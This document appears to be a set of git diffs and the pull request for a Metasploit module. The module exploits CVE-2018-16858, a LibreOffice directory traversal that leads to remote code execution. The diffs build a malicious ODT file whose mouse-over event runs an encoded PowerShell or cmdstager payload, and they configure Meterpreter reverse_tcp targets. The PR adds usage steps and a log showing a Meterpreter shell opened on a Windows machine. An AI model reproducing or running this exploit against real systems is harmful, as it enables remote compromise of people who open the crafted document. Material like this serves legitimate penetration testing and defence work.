     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
     libre_file = ERB.new(fodt_file).result(binding())
     libre_file

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::Powershell
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -40,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        =>  'linux',
               'Arch'            =>  ARCH_X86,
-              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp'
+              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
+              'CmdStagerFlavor' =>  [ 'printf' ]
             }
           ]
         ],
@@ -67,6 +69,11 @@ class MetasploitModule < Msf::Exploit::Remote
     @cmd << ' &amp;&amp; echo'
   end
 
+  def gen_linux_cmd
+    @cmd = generate_cmdstager
+    @cmd << ' &amp;&amp; echo'
+  end
+
   def gen_file(path)
     text_content = Rex::Text.rand_text_alpha(10..15)
 
@@ -78,11 +85,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    path = '../../../program/python-core-3.5.5/lib/pydoc.py'
     if datastore['TARGET'] == 0
-      path = '../../../program/python-core-3.5.5/lib/pydoc.py'
       gen_windows_cmd
     elsif datastore['TARGET'] == 1
-      path = '../../../../program/python-core-3.5.5/lib/pydoc.py'
+      gen_linux_cmd
     else
       fail_with(Failure::BadConfig, 'A formal target was not chosen.')
     end

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -46,17 +46,19 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows',
             {
               'Platform'        =>  'win',
-              'Arch'            =>  ARCH_X86,
-              'Payload'         =>  'windows/meterpreter/reverse_tcp'
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'Payload'         =>  'windows/meterpreter/reverse_tcp',
+              'DefaultOptions'  =>  { 'PrependMigrate'  =>  true }
             }
           ],
           [
             'Linux',
             {
               'Platform'        =>  'linux',
-              'Arch'            =>  ARCH_X86,
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
               'Payload'         =>  'linux/x86/meterpreter/reverse_tcp',
-              'CmdStagerFlavor' =>  'printf'
+              'DefaultOptions'  =>  { 'PrependFork' =>  true },
+              'CmdStagerFlavor' =>  'printf',
             }
           ]
         ],

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Powershell
 
   def initialize(info = {})
     super(update_info(info,
@@ -29,15 +30,17 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Windows',
             {
-              'Platform'  =>  'win',
-              'Payload'   =>  'windows/meterpreter/reverse_tcp'
+              'Platform'        =>  'win',
+              'Arch'            =>  ARCH_X86,
+              'Payload'         =>  'windows/meterpreter/reverse_tcp'
             }
           ],
           [
-            'Unix',
+            'Linux',
             {
-              'Platform'  =>  'unix',
-              'Payload'   =>  'cmd/unix/generic'
+              'Platform'        =>  'linux',
+              'Arch'            =>  ARCH_X86,
+              'Payload'         =>  'linux/x86/meterpreter/reverse_tcp'
             }
           ]
         ],
@@ -52,8 +55,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
+  def gen_windows_cmd
+    opts =
+    {
+      :remove_comspec       =>  true,
+      :method               =>  'reflection',
+      :wrap_double_quotes   =>  false,
+      :encode_final_payload =>  true
+    }
+    @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
+    @cmd << ' &amp;&amp; echo'
+  end
+
   def gen_file(path)
-    cmd = datastore['CMD']
     text_content = Rex::Text.rand_text_alpha(10..15)
 
     fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
@@ -66,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     if datastore['TARGET'] == 0
       path = '../../../program/python-core-3.5.5/lib/pydoc.py'
+      gen_windows_cmd
     elsif datastore['TARGET'] == 1
       path = '../../../../program/python-core-3.5.5/lib/pydoc.py'
     else

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     libre_file = ERB.new(fodt_file).result(binding())
     libre_file
   rescue Errno::ENOENT
-    fail_with(Failure::NotFound, 'Cannot find file')
+    fail_with(Failure::NotFound, 'Cannot find template file')
   end
 
   def exploit

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -1,0 +1,56 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Placeholder',
+      'Description'    => %q{
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Alex Inführ', # Vulnerability discovery and PoC
+        'Shelby Pace'  # Metasploit Module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-16858' ],
+          [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
+        ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'  =>  'win'
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'  =>  'Linux'
+            }
+          ]
+        ],
+      'DisclosureDate' => "Oct 18, 2018",
+      'DefaultTarget'  => 0
+    )
+  )
+  end
+
+  def gen_file
+    File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
+  end
+
+  def exploit
+    fodt_file = gen_file
+    file_create(fodt_file)
+  end
+end

--- a/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
+++ b/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -29,28 +29,50 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Windows',
             {
-              'Platform'  =>  'win'
+              'Platform'  =>  'win',
+              'Payload'   =>  'windows/meterpreter/reverse_tcp'
             }
           ],
           [
-            'Linux',
+            'Unix',
             {
-              'Platform'  =>  'Linux'
+              'Platform'  =>  'unix',
+              'Payload'   =>  'cmd/unix/generic'
             }
           ]
         ],
-      'DisclosureDate' => "Oct 18, 2018",
-      'DefaultTarget'  => 0
+      'DisclosureDate'  =>  "Oct 18, 2018",
+      'DefaultTarget'   =>  0
     )
   )
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'Output file name', 'librefile.fodt'])
+    ])
   end
 
-  def gen_file
-    File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
+  def gen_file(path)
+    cmd = datastore['CMD']
+    text_content = Rex::Text.rand_text_alpha(10..15)
+
+    fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
+    libre_file = ERB.new(fodt_file).result(binding())
+    libre_file
+  rescue Errno::ENOENT
+    fail_with(Failure::NotFound, 'Cannot find file')
   end
 
   def exploit
-    fodt_file = gen_file
+    if datastore['TARGET'] == 0
+      path = '../../../program/python-core-3.5.5/lib/pydoc.py'
+    elsif datastore['TARGET'] == 1
+      path = '../../../../program/python-core-3.5.5/lib/pydoc.py'
+    else
+      fail_with(Failure::BadConfig, 'A formal target was not chosen.')
+    end
+    fodt_file = gen_file(path)
+
     file_create(fodt_file)
   end
 end


### PR DESCRIPTION
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.

LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events to them. A macro can be tied to a program event by including the script that contains the macro and the function name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the Python script to be executed. This allows a program event to execute functions from Python scripts relative to the path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function that passes arguments to `os.system`, allowing RCE.

This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code. Tested on LibreOffice versions `6.1.0.1` and `6.1.2.1` on Windows and Linux.

**Note:** `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by this module due to the lack of ability to pass arguments.

## Verification

 - [x] Install the application
 - [x] Start msfconsole
 - [x] Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
 - [x] Do: ```set FILENAME <name>```
 - [x] Do: ```set LHOST <ip>```
 - [x] Do: ```set LPORT <port>```
 - [x] Do: ```run```
 - [x] Move the generated file to the target
 - [x] Start a handler
 - [x] Open the file with a vulnerable version of LibreOffice
 - [x] You should get a shell.

## Scenarios

```
  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run

  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (179779 bytes) to 192.168.37.156
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500

  meterpreter > getuid
  Server username: WIN-MGMN7ND70I1\a_user
  meterpreter > sysinfo
  Computer        : WIN-MGMN7ND70I1
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 1
  Meterpreter     : x86/windows
```

